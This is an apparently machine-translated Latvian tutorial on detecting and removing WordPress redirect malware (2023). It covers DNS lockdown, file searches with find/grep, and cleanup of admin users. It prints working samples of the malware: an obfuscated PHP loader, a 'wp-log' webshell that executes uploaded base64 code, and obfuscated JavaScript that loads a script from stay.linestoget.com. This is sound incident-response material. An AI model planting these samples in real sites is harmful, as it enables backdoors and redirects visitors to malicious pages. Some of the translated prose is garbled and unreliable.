Labot novirzīšanu WordPress Hack 2023 (vīrusa novirzīšana)

WordPress noteikti ir visvairāk izmantotā platforma CMS (Content Management System) Gan emuāriem, gan tiešsaistes starteru veikaliem (ar WooCommerce moduli), kas to padara par visvairāk mērķtiecīgu datoru uzbrukumiem (uzlaušana). Viena no visvairāk izmantotajām uzlaušanas operācijām mērķis ir novirzīt kompromitēto vietni uz citām tīmekļa lapām. Redirect WordPress Hack 2023 ir salīdzinoši jauna ļaunprātīga programmatūra, kas ietekmē visu vietni novirzīt uz surogātpastu tīmekļa lapām vai kuras, savukārt, var vīrusu lietotāju datori.

Ja jūsu vietne, kas izstrādāta WordPress, tiek novirzīta citā vietnē, upuris jau ir slavenais novirzīšanas hack.

Šajā apmācībā jūs atradīsit nepieciešamo informāciju un noderīgos padomus, caur kuriem varat noraidīt vietni, kas inficēta ar novirzīšanu WordPress Hack (Virus Redirect)Apvidū Ar komentāriem jūs varat saņemt papildu informāciju vai lūgt palīdzību.

Vīrusa noteikšana, kas novirza WordPress vietas

Pēkšņa un nepamatota trafika samazināšanās vietnē, samazina pasūtījumu skaitu (tiešsaistes veikalu gadījumā) vai reklāmas kvītis ir pirmās pazīmes, ka kaut kas nav pareizi. Atklāšana “Redirect WordPress Hack 2023” (Novirzīt vīrusu) var izdarīt un “vizuāls” Atverot vietni un jūs esat novirzīts uz citu tīmekļa lapu.

No pieredzes lielākā daļa tīmekļa ļaunprātīgas programmatūras lietojumprogrammu ir savietojamas ar interneta pārlūkprogrammām: Chrome, Firefox, Edge, OperaApvidū Ja esat Mac datora lietotājs, šie vīrusi nav ļoti redzami Safari pārlūkprogrammā. Safari drošības sistēma klusējot bloķē šos ļaunprātīgos skriptus.

Kas jums jādara, ja jums ir WordPress Hack Word Hack vīrusa vietne

Es ceru, ka pirmais pasākums nav panikas vai izdzēst vietni. Pat vīrusa vai vīrusa failu pat nav jāsvītro pirmajā posmā. Tie satur vērtīgu informāciju, kas var palīdzēt jums saprast, kur atrodas drošības pārkāpums un ko vīruss ir ietekmējis. Modus operandi.

Aizveriet vietni sabiedrībai.

Kā jūs aizverat vīrusa vietni apmeklētājiem? Vienkāršākais ir izmantot DNS pārvaldnieku un izdzēst viņa IP “Izšķirt” (domēna nosaukums) vai definējiet neeksistējošu IP. Tādējādi vietnes apmeklētāji tiks aizsargāti no šī novirzīšanas WordPress hack, kas tos var aizvest vīrusa vai surogātpasta tīmekļa lapās.

Ja jūs izmantojat CloudFlare Kā DNS pārvaldnieks jūs autentificējaties savā kontā un izdzēsiet DNS ierakstus “A” domēna vārdam. Tādējādi vīrusa skarto teritoriju paliks bez IP, kurai nav iespējas piekļūt no interneta.

Nokopējiet vietnes IP un dariet “ceļš” Lai varētu piekļūt tikai jums. No datora.

Kā mainīt vietnes reālo IP Windows datoros?

Metode bieži tiek izmantota, lai bloķētu piekļuvi noteiktām vietnēm, rediģējot failu “saimnieki”Apvidū

1. Atveriet Notepad vai citu teksta redaktoru (ar administratora tiesībām) un rediģējiet failu “hosts“Apvidū Tas atrodas:

C:\Windows\System32\drivers\etc\hosts

2. failā “saimnieki” pievienot “ceļš” uz jūsu vietnes īsto IP. IP izdzēsts iepriekš no DNS pārvaldnieka.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Saglabājiet failu un piekļūstiet vietnei pārlūkprogrammā.

Ja vietne neatveras un failā nav pieļāvusi kļūdu “saimnieki”, visticamāk, ir DNS kešatmiņa.

Lai izdzēstu DNS kešatmiņu Windows operētājsistēmā, atveriet komandu uzvedni, kur izpildāt pasūtījumu:

ipconfig /flushdns

Kā mainīt vietnes reālo IP Mac / MacBook datoros?

Mac datoru lietotājiem ir nedaudz vieglāk mainīt vietnes reālo IP.

1. Atveriet lietderību TerminalApvidū

2. Veiciet komandrindu (nepieciešama sistēmas parole izpildei):

sudo nano /etc/hosts

3. Kas attiecas uz Windows datoriem, pievienojiet domēna reālo IP.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Saglabājiet izmaiņas. Ctrl+X (y)Apvidū

Pēc tam, kad esat izdarījis “ceļš”, jūs esat vienīgā persona, kas var piekļūt WordPress Hack Word Hack vīrusa vietnei.

Pilna rezerves vietne – Faili un datu bāze

Pat ja tas ir vīruss ar “novirzīt WordPress Hack”, Ieteikums ir izveidot vispārēju visas vietnes rezerves kopiju. Faili un datu bāze. Iespējams, ka jūs varētu saglabāt abu failu vietējo kopiju public / public_html kā arī datu bāze.

Vīrusa un modificētu failu identificēšana WordPress Hack 2023

Galvenie mērķa faili WordPress Es esmu index.php (saknē), header.phpVerdzība index.php un footer.php no WordPress aktīvās tēmas. Manuāli pārbaudiet šos failus un identificējiet ļaunprātīgu kodu vai ļaunprātīgas programmatūras skriptu.

2023. gadā tipa vīruss “Novirzīt WordPress Hack” ielikt index.php Veidlapas kods:

(Es neiesaku jums izpildīt šos kodus!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekodēts, tas skripta ļaunprātīga programmatūra Tas praktiski ir WordPress vietnes sekas. Ļaunprātīgas programmatūras lietojumprogrammas pamatā nav skripts, bet tieši skripts ļauj novirzīt vīrusa tīmekļa lapu. Ja mēs atšifrējam skriptu iepriekš, mēs saņemam:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Lai norādītu visus servera failus, kas satur šo kodu, ir labi, ja ir piekļuve SSH uz serveri, lai palaistu čeku un administrēšanas failus vietnē Linux.

Saistīts: Kā jūs atrodat, vai jums ir vīrusu emuārs vai nē, ar Google meklēšanas palīdzību. (WordPress vīruss)

Zemāk ir divas komandas, kuras noteikti ir noderīgas, lai identificētu nesen modificētus failus un failus, kas satur noteiktu kodu (virkni).

Kā jūs redzat PHP failus, kas modificēti pēdējās 24 stundās vai citā laika diapazonā Linux?

Vadība “find” Tas ir ļoti vienkārši lietojams un ļauj personalizācijai iestatīt laika periodu, plāksteri, kurā tiek veikts meklēšana un failu veids.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Izvadē jūs saņemsit informāciju par datumu un laiku, kurā fails tika modificēts, rakstīšanas / lasīšanas / izpildes atļaujas (chmod) un kura grupa / lietotājs pieder.

Ja vēlaties pārbaudīt pirms vairākām dienām, mainiet vērtību “-mtime -1” vai izmantot “-mmin -360” minūtes (6 stundas).

Kā jūs meklējat kodu (virkni) PHP failu iekšpusē, Java?

Komandrinda “atrast” Ar kuru palīdzību jūs varat ātri atrast visus PHP vai Java failus, kas satur noteiktu kodu, ir šādi:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Pasūtījums meklēs un parādīs failus .php un .js saturošs “uJjBRODYsU“Apvidū

Ar divu iepriekš minēto pasūtījumu palīdzību jūs ļoti viegli atradīsit, kuri faili pēdējā laikā ir modificēti, un tajā ir ļaunprātīgas programmatūras kods.

Noņem ļaunprātīgu programmatūru no modificētajiem failiem, neapdraudot pareizo kodu. Manā scenārijā ļaunprātīgas programmatūras kods tika ievietots pirms atvēršanas <head>Apvidū

Pēc pirmās kārtas izpildes “atrast” Serverī ir ļoti iespējams atklāt jaunus failus, kas nav WordPress vai tur. Faili, kas pasludina WordPress Hack novirzīšanas vīrusu.

Manis izmeklētajā scenārijā formas faili parādījās serverī “wp-log-nOXdgD.php“Apvidū Tie ir faili “paaudze” kas satur arī ļaunprātīgas programmatūras kodu, ko izmanto novirzīšanas vīruss.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Failu tipa mērķis “wp-log-*” Tas ir izplatīt novirzīšanas hack vīrusu un citas vietnes, kas mitinātas serverī. Ir tipa ļaunprātīgas programmatūras kods “webshell” sastāv no viena Pamata sadaļa (kurā ir definēti daži šifrēti mainīgie) un o izpildes nodaļa ar kuru uzbrucējs mēģina sistēmā ielādēt un izpildīt ļaunprātīgas programmatūras kodu.

Ja ir mainīgais POST izsaukt ‘bh‘ un tā šifrētā vērtība MD5 ir vienāds ar “8f1f964a4b4d8d1ac3f0386693d28d03“, tad šķiet, ka skripts raksta šifrētu saturu base64 cita mainīgā, ko sauc par ‘b3‘ pagaidu failā un pēc tam mēģiniet iekļaut šo pagaidu failu.

Ja ir mainīgais POST vai GET izsaukt ‘tick'Skripts atbildēs ar vērtību MD5 no virknes “885“Apvidū

Lai identificētu visus servera failus, kas satur šo kodu, izvēlieties kopīgu virkni, pēc tam izpildiet komandu “find” (Līdzīgi kā iepriekš minētais). Dzēst visus failus, kas satur šo ļaunprātīgas programmatūras koduApvidū

Drošības pārkāpums, ko pārvalda WordPress Hack Redirect

Visticamāk, šis novirzītais vīruss sasniedz cauri WordPress administrācijas lietotāja izmantošana vai identificējot a neaizsargāts spraudnis kas ļauj pievienot lietotājus ar administratora privilēģijām.

Lielākajai daļai vietņu, kas veidota uz WordPress platformas, ir iespējama Motīvu vai spraudņa tēmu rediģēšanauz administrācijas saskarni (Dashboard). Tādējādi ļaunprātīga persona var pievienot motīva ļaunprātīgas programmatūras failus, kas ģenerē iepriekš sniegtos skriptus.

Šādas ļaunprātīgas programmatūras piemērs ir šāds:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificēts WordPress tēmas galvenē tūlīt pēc etiķetes atvēršanas <head>Apvidū

Šo JavaScript ir diezgan grūti atšifrēt, taču ir acīmredzams, ka cita tīmekļa adrese, visticamāk, ved citus skriptus, lai izveidotu failus “wp-log-*” par to, par kuru es runāju iepriekš.

Meklējiet un izdzēsiet šo kodu no visiem failiem PHP skarti.

Cik es varēju noskaidrot, šis kods bija manuāli pievienots Jauns lietotājs ar administratīvajām privilēģijām.

Tātad, lai novērstu ļaunprātīgas programmatūras pievienošanu informācijas panelī, vislabāk ir atspējot WordPress / spraudņus informācijas panelī.

Rediģēt failu wp-config.php un pievienojiet līnijas:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Pēc šo izmaiņu veikšanas neviens WordPress lietotājs nevarēs rediģēt informācijas paneļa failus.

Pārbaudiet lietotājus ar administratora lomu

Zemāk ir SQL vaicājums, kuru varat izmantot, lai meklētu lietotājus ar administratoru WordPress platformā:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Šis vaicājums atgriezīs visus tabulā esošos lietotājus wp_users kurš attiecināja uz administratora lomu. Vaicājums tiek veikts galdam wp_usermeta Lai meklētu meta ‘wp_capabilities', Kas satur informāciju par lietotāju lomām.

Vēl viena metode ir to identificēšana no: Dashboard → Users → All Users → AdministratorApvidū Bet es praktizēju lietotāju var paslēpt paneļa panelī. Tātad labākais veids, kā redzēt lietotājus “Administrators” WordPress ir SQL komanda iepriekš.

Manā gadījumā es datu bāzē identificēju lietotāju ar vārdu “wp-import-user“Apvidū Diezgan ierosinošs.

No šejienes jūs varat redzēt datumu un laiku, kad tika izveidots WordPress lietotājs. Lietotāja lietotājs ir arī ļoti svarīgs, jo viņš meklēja servera žurnālus. Tādā veidā jūs varat redzēt visu šī lietotāja darbību.

Dzēst lietotājus ar administratora lomu Ka tad jūs nezināt, tad Mainiet savas paroles visiem administratīvajiem lietotājiem. Redaktors, autors, administrators.

Mainiet SQL lietotāja paroli uz datu bāzi no skartās vietnes.

Pēc šo darbību veikšanas vietni var atsākt visiem lietotājiem.

Tomēr ņemiet vērā, ka tas, ko es iesniedzu iepriekš, ir viens no tūkstošiem iespiešanas, ar kuru vietne ir ar novirzīšanu WordPress hack 2023. gadā.

Ja jūsu vietne ir bijusi vīruss un nepieciešama palīdzība vai ja jums ir kādas bažas, komentāru lodziņš ir atvērts.